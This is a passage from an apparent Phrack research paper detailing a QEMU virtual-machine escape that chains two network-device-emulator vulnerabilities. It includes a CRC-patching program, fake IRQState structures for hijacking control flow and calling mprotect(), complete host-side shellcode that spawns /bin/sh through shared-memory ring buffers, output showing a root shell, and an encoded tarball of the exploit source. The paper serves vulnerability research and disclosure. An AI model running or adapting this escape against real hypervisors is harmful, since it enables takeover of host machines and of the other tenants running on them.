structure and passing the physical address of this structure to the
card (through registers CSR1 and CSR2):

    struct pcnet_config {
        uint16_t mode;      /* working mode: promiscuous,
                               looptest, etc. */
        uint8_t  rlen;      /* number of rx descriptors in log2 base */
        uint8_t  tlen;      /* number of tx descriptors in log2 base */
        uint8_t  mac[6];    /* mac address */
        uint16_t _reserved;
        uint8_t  ladr[8];   /* logical address filter */
        uint32_t rx_desc;   /* physical address of rx descriptor buffer */
        uint32_t tx_desc;   /* physical address of tx descriptor buffer */
    };

----[ 4.3 - Reversing CRC

As discussed previously, we need to fill the packet with data in such a
way that the computed CRC matches the address of our fake structure.
Fortunately, the CRC is reversible. Thanks to the ideas exposed in [6],
we can apply a 4-byte patch to our packet so that the computed CRC
matches a value of our choice.

The source code reverse-crc.c applies a patch to a pre-filled buffer so
that the computed CRC is equal to 0xdeadbeef.

---[ reverse-crc.c ]---

#include <stdio.h>
#include <stdint.h>

#define CRC(crc, ch) (crc = (crc >> 8) ^ crctab[(crc ^ (ch)) & 0xff])

/* generated using the AUTODIN II polynomial
 *   x^32 + x^26 + x^23 + x^22 + x^16 +
 *   x^12 + x^11 + x^10 + x^8 + x^7 + x^5 + x^4 + x^2 + x^1 + 1
 */
static const uint32_t crctab[256] = {
    0x00000000, 0x77073096, 0xee0e612c, 0x990951ba,
    0x076dc419, 0x706af48f, 0xe963a535, 0x9e6495a3,
    0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988,
    0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91,
    0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de,
    0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7,
    0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec,
    0x14015c4f, 0x63066cd9, 0xfa0f3d63, 0x8d080df5,
    0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172,
    0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b,
    0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940,
    0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59,
    0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116,
    0x21b4f4b5, 0x56b3c423, 0xcfba9599, 0xb8bda50f,
    0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924,
    0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d,
    0x76dc4190, 0x01db7106, 0x98d220bc, 0xefd5102a,
    0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433,
    0x7807c9a2,
0x0f00f934, 0x9609a88e, 0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01, 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, 0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950, 0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65, 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, 0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0, 0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa, 0xbe0b1010, 0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f, 0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17, 0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a, 0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683, 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8, 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, 0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb, 0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc, 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, 0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b, 0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, 0x316e8eef, 0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236, 0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe, 0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d, 0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713, 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, 0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242, 0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777, 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, 0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45, 0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2, 0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, 0x40df0b66, 0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 
    0x30b5ffe9, 0xbdbdf21c, 0xcabac28a, 0x53b39330,
    0x24b4a3a6, 0xbad03605, 0xcdd70693, 0x54de5729,
    0x23d967bf, 0xb3667a2e, 0xc4614ab8, 0x5d681b02,
    0x2a6f2b94, 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b,
    0x2d02ef8d,
};

uint32_t crc_compute(uint8_t *buffer, size_t size)
{
    uint32_t fcs = ~0;
    uint8_t *p = buffer;

    while (p != &buffer[size])
        CRC(fcs, *p++);

    return fcs;
}

uint32_t crc_reverse(uint32_t current, uint32_t target)
{
    size_t i = 0, j;
    uint8_t *ptr;
    uint32_t workspace[2] = { current, target };

    for (i = 0; i < 2; i++)
        workspace[i] &= (uint32_t)~0;

    ptr = (uint8_t *)(workspace + 1);

    for (i = 0; i < 4; i++) {
        j = 0;
        while (crctab[j] >> 24 != *(ptr + 3 - i))
            j++;
        *((uint32_t *)(ptr - i)) ^= crctab[j];
        *(ptr - i - 1) ^= j;
    }

    return *(uint32_t *)(ptr - 4);
}

int main()
{
    uint32_t fcs;
    uint32_t buffer[2] = { 0xcafecafe };
    uint8_t *ptr = (uint8_t *)buffer;

    fcs = crc_compute(ptr, 4);
    printf("[+] current crc = 0x%08x, required crc = 0x%08x\n",
           fcs, 0xdeadbeef);

    fcs = crc_reverse(fcs, 0xdeadbeef);
    printf("[+] applying patch = 0x%08x\n", fcs);

    buffer[1] = fcs;
    fcs = crc_compute(ptr, 8);

    if (fcs == 0xdeadbeef)
        printf("[+] crc patched successfully\n");
}

----[ 4.4 - Exploit

The exploit (file cve-2015-7504.c from the attached source code
tarball) resets the card to its default settings, then configures the
Tx and Rx descriptors and sets the required flags, and finally inits
and restarts the card to push our network card config.

The rest of the exploit simply triggers the vulnerability and crashes
QEMU with a single packet. As shown below, qemu_set_irq() is called
with a corrupted irq variable pointing to 0x7f66deadbeef. QEMU crashes
as there is no runnable handler at this address.

(gdb) shell ps -e | grep qemu
 8335 pts/4    00:00:03 qemu-system-x86
(gdb) attach 8335
...
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x00007f669ce6c363 in qemu_set_irq (irq=0x7f66deadbeef, level=0)
43          irq->handler(irq->opaque, irq->n, level);

--[ 5 - Putting all Together

In this section, we merge the two previous exploits in order to escape
from the VM and get code execution on the host with QEMU's privileges.

First, we exploit CVE-2015-5165 in order to reconstruct the memory
layout of QEMU. More precisely, the exploit tries to resolve the
following addresses in order to bypass ASLR:

  - The guest physical memory base address. In our exploit, we need to
    make some allocations on the guest and get their precise addresses
    within the virtual address space of QEMU.

  - The .text section base address. This serves to get the address of
    the qemu_set_irq() function.

  - The .plt section base address. This serves to determine the
    addresses of some functions such as fork() and execv() used to
    build our shellcode. The address of mprotect() is also needed to
    change the permissions of the guest physical memory. Remember that
    the physical memory allocated for the guest is not executable.

----[ 5.1 - RIP Control

As shown in section 4, we have control over the %rip register. Instead
of letting QEMU crash at an arbitrary address, we overflow the PCNET
buffer with an address pointing to a fake IRQState that calls a
function of our choice.

At first sight, one could be tempted to build a fake IRQState that runs
system(). However, this call will fail as some of QEMU's memory
mappings are not preserved across a fork() call. More precisely, the
mmapped physical memory is marked with the MADV_DONTFORK flag:

    qemu_madvise(new_block->host, new_block->max_length,
                 QEMU_MADV_DONTFORK);

Calling execv() is not useful either, as we would lose our hold on the
guest machine. Note also that one could construct a shellcode by
chaining several fake IRQState structures in order to call multiple
functions, since qemu_set_irq() is called several times by the PCNET
device emulator.
However, we found that it's more convenient and more reliable to
execute a shellcode after having enabled the PROT_EXEC flag on the
memory page where the shellcode is located. Our idea is to build two
fake IRQState structures. The first one is used to make a call to
mprotect(). The second one is used to call a shellcode that will first
undo the MADV_DONTFORK flag and then run an interactive shell between
the guest and the host.

As stated earlier, when qemu_set_irq() is called, it takes two
parameters as input: irq (a pointer to an IRQState structure) and level
(the IRQ level), then calls the handler as follows:

    void qemu_set_irq(qemu_irq irq, int level)
    {
        if (!irq)
            return;
        irq->handler(irq->opaque, irq->n, level);
    }

As shown above, we control only the first two parameters. So how do we
call mprotect(), which takes three arguments? To overcome this, we make
qemu_set_irq() call itself first with the following parameters:

  - irq: pointer to a fake IRQState that sets the handler pointer to
    the mprotect() function.

  - level: mprotect() flags set to PROT_READ | PROT_WRITE | PROT_EXEC.

This is achieved by setting up two fake IRQState structures, as shown
by the following code snippet:

    struct IRQState {
        uint8_t  _nothing[44];
        uint64_t handler;
        uint64_t arg_1;
        int32_t  arg_2;
    };

    struct IRQState fake_irq[2];
    hptr_t fake_irq_mem = gva_to_hva(fake_irq);

    /* do qemu_set_irq */
    fake_irq[0].handler = qemu_set_irq_addr;
    fake_irq[0].arg_1   = fake_irq_mem + sizeof(struct IRQState);
    fake_irq[0].arg_2   = PROT_READ | PROT_WRITE | PROT_EXEC;

    /* do mprotect */
    fake_irq[1].handler = mprotect_addr;
    fake_irq[1].arg_1   = (fake_irq_mem >> PAGE_SHIFT) << PAGE_SHIFT;
    fake_irq[1].arg_2   = PAGE_SIZE;

After the overflow takes place, qemu_set_irq() is called with a fake
handler that simply recalls qemu_set_irq(), which in turn calls
mprotect() after having adjusted the level parameter to 7 (the flags
required by mprotect).
The memory is now executable, and we can pass control to our
interactive shell by rewriting the handler of the first IRQState with
the address of our shellcode:

    payload.fake_irq[0].handler = shellcode_addr;
    payload.fake_irq[0].arg_1   = shellcode_data;

----[ 5.2 - Interactive Shell

Well. We could simply write a basic shellcode that binds a shell to
netcat on some port and then connect to that shell from a separate
machine. That's a satisfactory solution, but we can do better to avoid
firewall restrictions. We can leverage a shared memory between the
guest and the host to build a bindshell.

Exploiting QEMU's vulnerabilities is a little bit subtle, as the code
we are writing in the guest is already available in QEMU's process
memory. So there is no need to inject a shellcode. Even better, we can
share code and make it run on both the guest and the attacked host.

The following figure summarizes the shared memory and the
processes/threads running on the host and the guest. We create two
shared ring buffers (in and out) and provide read/write primitives with
spin-lock access to those shared memory areas. On the host machine, we
run a shellcode that starts a /bin/sh shell in a separate process after
having first duplicated its stdin and stdout file descriptors. We also
create two threads. The first one reads commands from the shared memory
and passes them to the shell via a pipe. The second thread reads the
output of the shell (from a second pipe) and writes it to the shared
memory.

These two threads are also instantiated on the guest machine, to write
user input commands to the dedicated shared memory and to print the
results read from the second ring buffer to stdout, respectively.

Note that in our exploit we have a third thread (and a dedicated shared
area) to handle stderr output.
        GUEST                 SHARED MEMORY                  HOST
        -----                 -------------                  ----

    +------------+                                      +------------+
    |  exploit   |                                      |    QEMU    |
    |  (thread)  |                                      |   (main)   |
    +------------+                                      +------------+

    +------------+ sm_write()    head       sm_read()   +------------+
    |  exploit   |----------+     |      +--------------|    QEMU    |
    |  (thread)  |          |     V      |              |  (thread)  |
    +------------+          |  xxxxxxxxxxxxxx----+      +---------++-+
                            |  x              |  |       pipe IN  ||
                            |  x ring buffer  |  |      +---------++-+
                    tail ----->x (filled with x) |      |   shell    |
                            ^                 |  |      | fork proc. |
                            +-------->--------+  |      +---------++-+
                                                         pipe OUT ||
    +------------+ sm_read()     tail      sm_write()   +---------++-+
    |  exploit   |----------+     |      +--------------|    QEMU    |
    |  (thread)  |          |     V      |              |  (thread)  |
    +------------+          |  xxxxxxxxxxxxxx----+      +------------+
                            |  x              |  |
                            |  x ring buffer  |  |
                    head ----->x (filled with x) |
                            ^                 |  |
                            +-------->--------+
    struct GOT {
        typeof(open)   *open;
        typeof(close)  *close;
        typeof(read)   *read;
        typeof(write)  *write;
        typeof(dup2)   *dup2;
        typeof(pipe)   *pipe;
        typeof(fork)   *fork;
        typeof(execv)  *execv;
        typeof(malloc) *malloc;
        typeof(madvise) *madvise;
        typeof(pthread_create) *pthread_create;
        typeof(pipe_r2fd) *pipe_r2fd;
        typeof(pipe_fd2r) *pipe_fd2r;
    };

The main shellcode is defined by the following function:

    /* main code to run after %rip control */
    void shellcode(struct shared_data *shared_data)
    {
        pthread_t t_in, t_out, t_err;
        int in_fds[2], out_fds[2], err_fds[2];
        struct brwpipe *in, *out, *err;
        char *args[2] = { shared_data->shell, NULL };

        if (shared_data->done) {
            return;
        }

        shared_data->got.madvise((uint64_t *)shared_data->addr,
                                 PHY_RAM, MADV_DOFORK);

        shared_data->got.pipe(in_fds);
        shared_data->got.pipe(out_fds);
        shared_data->got.pipe(err_fds);

        in  = shared_data->got.malloc(sizeof(struct brwpipe));
        out = shared_data->got.malloc(sizeof(struct brwpipe));
        err = shared_data->got.malloc(sizeof(struct brwpipe));

        in->got  = &shared_data->got;
        out->got = &shared_data->got;
        err->got = &shared_data->got;

        in->fd  = in_fds[1];
        out->fd = out_fds[0];
        err->fd = err_fds[0];

        in->ring  = &shared_data->shared_io.in;
        out->ring = &shared_data->shared_io.out;
        err->ring = &shared_data->shared_io.err;

        if (shared_data->got.fork() == 0) {
            shared_data->got.close(in_fds[1]);
            shared_data->got.close(out_fds[0]);
            shared_data->got.close(err_fds[0]);

            shared_data->got.dup2(in_fds[0], 0);
            shared_data->got.dup2(out_fds[1], 1);
            shared_data->got.dup2(err_fds[1], 2);

            shared_data->got.execv(shared_data->shell, args);
        } else {
            shared_data->got.close(in_fds[0]);
            shared_data->got.close(out_fds[1]);
            shared_data->got.close(err_fds[1]);

            shared_data->got.pthread_create(&t_in, NULL,
                                  shared_data->got.pipe_r2fd, in);
            shared_data->got.pthread_create(&t_out, NULL,
                                  shared_data->got.pipe_fd2r, out);
            shared_data->got.pthread_create(&t_err, NULL,
                                  shared_data->got.pipe_fd2r, err);

            shared_data->done = 1;
        }
    }

The shellcode first checks the flag
shared_data->done to avoid running the shellcode multiple times
(remember that qemu_set_irq(), used to pass control to the shellcode,
is called several times by QEMU's code).

The shellcode calls madvise() with shared_data->addr pointing to the
physical memory. This is necessary to undo the MADV_DONTFORK flag and
hence preserve the memory mappings across fork() calls.

The shellcode creates a child process that is responsible for starting
a shell ("/bin/sh"). The parent process starts the threads that make
use of the shared memory areas to pass shell commands from the guest to
the attacked host and to write back the results of these commands to
the guest machine. The communication between the parent and the child
process is carried over pipes.

As shown below, a shared memory area consists of a ring buffer that is
accessed through the sm_read() and sm_write() primitives:

    struct shared_ring_buf {
        volatile bool lock;
        bool     empty;
        uint8_t  head;
        uint8_t  tail;
        uint8_t  buf[SHARED_BUFFER_SIZE];
    };

    static inline __attribute__((always_inline))
    ssize_t sm_read(struct GOT *got, struct shared_ring_buf *ring,
                    char *out, ssize_t len)
    {
        ssize_t read = 0, available = 0;

        do {
            /* spin lock */
            while (__atomic_test_and_set(&ring->lock, __ATOMIC_RELAXED));

            if (ring->head > ring->tail) {  /* loop on ring */
                available = SHARED_BUFFER_SIZE - ring->head;
            } else {
                available = ring->tail - ring->head;
                if (available == 0 && !ring->empty) {
                    available = SHARED_BUFFER_SIZE - ring->head;
                }
            }

            available = MIN(len - read, available);
            imemcpy(out, ring->buf + ring->head, available);

            read += available;
            out  += available;
            ring->head += available;

            if (ring->head == SHARED_BUFFER_SIZE)
                ring->head = 0;
            if (available != 0 && ring->head == ring->tail)
                ring->empty = true;

            __atomic_clear(&ring->lock, __ATOMIC_RELAXED);
        } while (available != 0 || read == 0);

        return read;
    }

    static inline __attribute__((always_inline))
    ssize_t sm_write(struct GOT *got, struct shared_ring_buf *ring,
                     char *in, ssize_t len)
    {
        ssize_t written = 0, available = 0;

        do {
            /* spin lock */
            while (__atomic_test_and_set(&ring->lock, __ATOMIC_RELAXED));

            if (ring->tail > ring->head) {  /* loop on ring */
                available = SHARED_BUFFER_SIZE - ring->tail;
            } else {
                available = ring->head - ring->tail;
                if (available == 0 && ring->empty) {
                    available = SHARED_BUFFER_SIZE - ring->tail;
                }
            }

            available = MIN(len - written, available);
            imemcpy(ring->buf + ring->tail, in, available);

            written += available;
            in      += available;
            ring->tail += available;

            if (ring->tail == SHARED_BUFFER_SIZE)
                ring->tail = 0;
            if (available != 0)
                ring->empty = false;

            __atomic_clear(&ring->lock, __ATOMIC_RELAXED);
        } while (written != len);

        return written;
    }

These primitives are used by the following thread functions. The first
one reads data from a shared memory area and writes it to a file
descriptor. The second one reads data from a file descriptor and writes
it to a shared memory area.

    void *pipe_r2fd(void *_brwpipe)
    {
        struct brwpipe *brwpipe = (struct brwpipe *)_brwpipe;
        char buf[SHARED_BUFFER_SIZE];
        ssize_t len;

        while (true) {
            len = sm_read(brwpipe->got, brwpipe->ring, buf, sizeof(buf));
            if (len > 0)
                brwpipe->got->write(brwpipe->fd, buf, len);
        }

        return NULL;
    }
    SHELLCODE(pipe_r2fd)

    void *pipe_fd2r(void *_brwpipe)
    {
        struct brwpipe *brwpipe = (struct brwpipe *)_brwpipe;
        char buf[SHARED_BUFFER_SIZE];
        ssize_t len;

        while (true) {
            len = brwpipe->got->read(brwpipe->fd, buf, sizeof(buf));
            if (len < 0) {
                return NULL;
            } else if (len > 0) {
                len = sm_write(brwpipe->got, brwpipe->ring, buf, len);
            }
        }

        return NULL;
    }

Note that the code of these functions is shared between the host and
the guest.
These threads are also instantiated in the guest machine to read user
input commands and copy them to the dedicated shared memory area (the
in memory), and to write back the output of these commands, available
in the corresponding shared memory areas (the out and err shared
memories):

    void session(struct shared_io *shared_io)
    {
        size_t len;
        pthread_t t_in, t_out, t_err;
        struct GOT got;
        struct brwpipe *in, *out, *err;

        got.read  = &read;
        got.write = &write;

        warnx("[!] enjoy your shell");
        fputs(COLOR_SHELL, stderr);

        in  = malloc(sizeof(struct brwpipe));
        out = malloc(sizeof(struct brwpipe));
        err = malloc(sizeof(struct brwpipe));

        in->got  = &got;
        out->got = &got;
        err->got = &got;

        in->fd  = STDIN_FILENO;
        out->fd = STDOUT_FILENO;
        err->fd = STDERR_FILENO;

        in->ring  = &shared_io->in;
        out->ring = &shared_io->out;
        err->ring = &shared_io->err;

        pthread_create(&t_in, NULL, pipe_fd2r, in);
        pthread_create(&t_out, NULL, pipe_r2fd, out);
        pthread_create(&t_err, NULL, pipe_r2fd, err);

        pthread_join(t_in, NULL);
        pthread_join(t_out, NULL);
        pthread_join(t_err, NULL);
    }

The figure presented in the previous section illustrates the shared
memories and the processes/threads started on the guest and the host
machines.

The exploit targets a vulnerable version of QEMU built with version
4.9.2 of GCC. In order to adapt the exploit to a specific QEMU build,
we provide a shell script (build-exploit.sh) that outputs a C header
with the required offsets:

    $ ./build-exploit <path-to-qemu-binary> > qemu.h

Running the full exploit (vm-escape.c) results in the following output:

    $ ./vm-escape
    $ exploit: [+] found 190 potential ObjectProperty structs in memory
    $ exploit: [+] .text mapped at 0x7fb6c55c3620
    $ exploit: [+] mprotect mapped at 0x7fb6c55c0f10
    $ exploit: [+] qemu_set_irq mapped at 0x7fb6c5795347
    $ exploit: [+] VM physical memory mapped at 0x7fb630000000
    $ exploit: [+] payload at 0x7fb6a8913000
    $ exploit: [+] patching packet ...
    $ exploit: [+] running first attack stage
    $ exploit: [+] running shellcode at 0x7fb6a89132d0
    $ exploit: [!] enjoy your shell
    $ shell > id
    $ uid=0(root) gid=0(root) ...

----[ 5.4 - Limitations

Please note that the current exploit is still somewhat unreliable. In
our testing environment (Debian 7 running a 3.16 kernel on the x86_64
arch), we have observed a failure rate of approximately 1 in 10 runs.
In most unsuccessful attempts, the exploit fails to reconstruct the
memory layout of QEMU due to unusable leaked data.

The exploit does not work on Linux kernels compiled without the
CONFIG_ARCH_BINFMT_ELF_RANDOMIZE_PIE flag. In this case the QEMU binary
(compiled by default with -fPIE) is mapped into a separate address
space, as shown by the following listing:

    55e5e3fdd000-55e5e4594000 r-xp 00000000 fe:01 6940407 [qemu-system-x86_64]
    55e5e4794000-55e5e4862000 r--p 005b7000 fe:01 6940407 ...
    55e5e4862000-55e5e48e3000 rw-p 00685000 fe:01 6940407 ...
    55e5e48e3000-55e5e4d71000 rw-p 00000000 00:00 0
    55e5e6156000-55e5e7931000 rw-p 00000000 00:00 0       [heap]
    7fb80b4f5000-7fb80c000000 rw-p 00000000 00:00 0
    7fb80c000000-7fb88c000000 rw-p 00000000 00:00 0       [2 GB of RAM]
    7fb88c000000-7fb88c915000 rw-p 00000000 00:00 0       ...
    7fb89b6a0000-7fb89b6cb000 r-xp 00000000 fe:01 794385  [first shared lib]
    7fb89b6cb000-7fb89b8cb000 ---p 0002b000 fe:01 794385  ...
    7fb89b8cb000-7fb89b8cc000 r--p 0002b000 fe:01 794385  ...
    7fb89b8cc000-7fb89b8cd000 rw-p 0002c000 fe:01 794385  ...
    ...
    7ffd8f8f8000-7ffd8f91a000 rw-p 00000000 00:00 0       [stack]
    7ffd8f970000-7ffd8f972000 r--p 00000000 00:00 0       [vvar]
    7ffd8f972000-7ffd8f974000 r-xp 00000000 00:00 0       [vdso]
    ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]

As a consequence, our 4-byte overflow is not sufficient to redirect the
irq pointer (originally located in the heap, somewhere at
0x55xxxxxxxxxx) so that it points to our fake IRQState structure
(injected somewhere at 0x7fxxxxxxxxxx).
--[ 6 - Conclusions

In this paper, we have presented two exploits against QEMU's network
device emulators. The combination of these exploits makes it possible
to break out of a VM and execute code on the host.

During this work, we have probably crashed our testing VM more than one
thousand times. It was tedious to debug unsuccessful exploit attempts,
especially with a complex shellcode that spawns several threads and
processes. So we hope that we have provided sufficient technical
details and generic techniques that can be reused for further
exploitation of QEMU.

--[ 7 - Greets

We would like to thank Pierre-Sylvain Desse for his insightful
comments.

Greets to coldshell, and to Kevin Schouteeten for helping us to test on
various environments.

Thanks also to Nelson Elhage for his seminal work on VM escape.

And a big thanks to the reviewers of the Phrack Staff for challenging
us to improve the paper and the code.

--[ 8 - References

[1] http://venom.crowdstrike.com
[2] media.blackhat.com/bh-us-11/Elhage/BH_US_11_Elhage_Virtunoid_WP.pdf
[3] https://github.com/nelhage/virtunoid/blob/master/virtunoid.c
[4] http://lettieri.iet.unipi.it/virtualization/2014/Vtx.pdf
[5] https://www.kernel.org/doc/Documentation/vm/pagemap.txt
[6] https://blog.affien.com/archives/2005/07/15/reversing-crc/

--[ 9 - Source Code

begin 644 vm_escape.tar.gz
M'_;*<<SLE]V8*\9M@+\-918SLPZQIJ&PMN"S(:Y2B\O!E>7?K.;+2=T0%97( MJJK5Y%5U2-4EJSI0'PN'JK=Y5BECEQD>J]^BZ@(UML4ZS[_(C*=T^_E,W'8* M'8-063(/T<4P61P0OEEZ<;U\*V=.PU:1-1&5XCP11E@:W41#G`B]!_PY$JKM M*595(<(?L\OXIGE/,2TWJZLCZ7NOKA-+"W6P5-J?2(6]T-:CJEXV#G[>NW<H M-1TOGCY^:I1O8:_]S3-A%%FRTH.=[:E;33HEOYR?WV=S2SB?NRQNH5UX);/! M),U+?.D;0%S0\=F=SS@(\Z6!",2I`YKT+8P9#5AL$.7Q22\:RQO)ATTN&K<G M7`!P">EK`4EC'+2]3%3*#K7L*=%::CB0A"\%*>_=.Z\Z8U7ZC#W$?>]>A4O2 M_6$]6`*7(@`WJQ7IRUG,Y^6&/'!A*TIV;UB=Q@0Z57WR\WXG4UR9M.=GRX9A MHIM2`L>6F2DG:,>N#M`5J^ME]NGPZ[PX5*SSIJ_Q3G!*-X-38:A!WX1A'9W. MDIS?V2HS^\AX4SN1>/3BQ>SYDT=G7_W7)-YLV!$'?,&S<IG'Z_1B<L#5P\EH M`Q5I+3[^\A?,>]4^-;&+BWZ(PRZ(F.;],+BEZX*U;L`.3U[Q-AM[\MDIBSKJ MVMYEO$DO\O(E_3V'];C`20_E3C2Y-%YXIJ@I4!>#F0S??R8G(CI10?.M%A3L M!13@6'.:S8MB5OUF$4`C3AP@1ICJ/U$2H+FL<)`-I5O[/=UD$7]KK4HC]Y#8 M=4[0`K>\GH8495*\SEG8*$EE-TG,OFXR347>W!&)WM".SG@#)*(NP%=)H#V% M)/=.JQZ^D<-P7"<=6R(1P:I)<-H`PI%M@4CJR1'$:NI**V4DYSTDUA%-PV2@ M1#V7`!5L9N@2'___#V)&XZ_LDZ62<&4'A._]2P8I-2""DBTPF7HJ[6@17'[M MHB"J=U!PZJFTO&44_%5%,6W.>DH34D30:8]4*XJ"*I&WT:I9&!GR77R`G<1, M^'Z]S?K?$'2Z5?O77*"KZ^W?8WG&(9J(919?_N"'#_XW02A70$%8*G9,.;IE MM+'$F;7^&GUF93/89,N>H6>BZBY(7@X1B?O<'C&$M!$^V5Z0K(VWEB.#[*VE MV"Y[:S$RS]Y:BJVTMQ83=N1;2I%)]]929+J]M11;<&]O6-,*6^[8Q2Q4;2KD M>5?R5QJO,_$PA'U/PYE@,:G=AQPUG3+=,Z0W''%`7$Q4OQR=TF?-TN\GM;>3 MC[5_DPX8^;\1,,E$>G_Y*%V^=,NS"YG#>GJKCYJD<Y3-35NZU$^>Y`F!F;HZ M$52&8"CY04SA3207-ZM+``U..A?CE^.'V7O3^'BJ>)#ZJ+B)^E@[>?K8<.3T ML;5[4;PW?52=+S6J@:5*(W>PY60X=FH8E7';H6+[)+I<H>*W9%!<]EM`:X&I MMW(JD%Z\.V'()5-5R+PQ^\K`-_/&W3**Z\XH*FO$X+YY8/!QY[5,=,,^O)8H MBXA<%@CMJ7&`?\7N24P<M<0.$TC!*98:&!*VIYRQLJ5RCWBD&_A#3=6,B"K7 M0^!]\L!P-_$T&]F>[^RM3=Z.S7'Y6B;LP6MO$`HXXT2+]^#4^*?><9N^/&#\ MX?E_G;U`)XG=$JUY3IN57S;55;];@_-=];.EF>Z\09F5^5)>+LMQ$W>GK/ZH M]1AL?E%=0FKE`,]2<?LO\4E,\E*1Y2T*9@V/HDLOUJWS\D)OX'2+B_I2#O[` MAA!6IE3N?.KVUPYUKM?K?+E%H5.5WL3KUV+W)YF3#TQP9M7%3B`@]*U60L6Y MO#R4=0IT>&?887";^1MW:A7X_!SG83U#_FF>[*M:G)!WB14`ZC<.-;A=17:\ MD0<\VA!.A'^A-^=H[&N[N$N?3GACZ0`#S0\/\4B$Y:>3VEX9*N6M(.;_>&I4 
M6+B@R",&Q.PW?$LB]2CWS@T:*92E/#[W[]^_(T(_+"GV@Q@U1N0>&6[+XEF\ M,E5V%+KGIU/^.SC6W5>@4_%R]+9@XG$I318A"T7]70&L-I,%,'\_?D@NT4[9 M7=='<J%U4H7$J,J@PYX[KV[B^-5-DKRZ2=-7-UGVZB;/7\$.GB@IBZ[YTA\D M@Y*XT26*7O>*8]$[%<TPQ*:&Z%I!IW*O)@5234GMB/9MGW@]G9>P5E=+*KW7 M3=(EGA&/.Z]GH3F4=W#*YQWY^R/]-DUS^_ZK;A+MOD1A9<'K5%IO>8;$?GM[ MQ"^.4?D%#3QAJ<M=E6=)Z?&/(4MC]1Z?0"0?V#,]L`<?+!F=?)@LO--)\=J5 MH[0:[$;^/A[9=?7H4FK[VB$L^D"0/G_QS'CR_3/CT>/'Z,2.?`3J.DQC:SL$ MRG-_<BS7(?RMS`7ZK<R%O?98"),>;$*Q@$,\DGQ=2G^;?23_*&DN&@][JW@A M/1D0`)U9JKDC5^]'S^1B"9DW83O[\;-JE6S&]='O6^6OFQD_3M+[95"*\8C+ MA.KY//MLF"KITE_#7L.-';9)P;9$-]6N2^8I&G&M_E#74S6=GTSL=2<G?Y4B M27T1-%!\K2\N)J\L(F?AM*I#]E86%=NZAGJ#/#5?7JU7&U0;\R:.-%'X4G.^ M_H=($N^39OA282:/0577BQ2=F?Y3^N.H=QN*I%NLC@QTOR$;0[I4Z;#[_*3O M8DFCAJ6+#_YQ9%3O#@NANR_3U3I7G#"29A7F8:VI_T>Y6F\&M.5'M]'![Z9[ MU^G:8:M1M4THC*O?9>NWHBI6TFH]\6\9_*K%CE!1RH>M!LOTG=WH/0DMKDUV M'3JZ#9P"C6F34U7,U8R__;$0J+*Z6DP<-G#5G[%;=#@RV@)H:"/6V^B6.N:@ M)<0:4DTY8VJU50I:=8GL8#AJG:OZ6RY&HEF<=X+E(L^O)C9]5R]/Q5TXWS8V 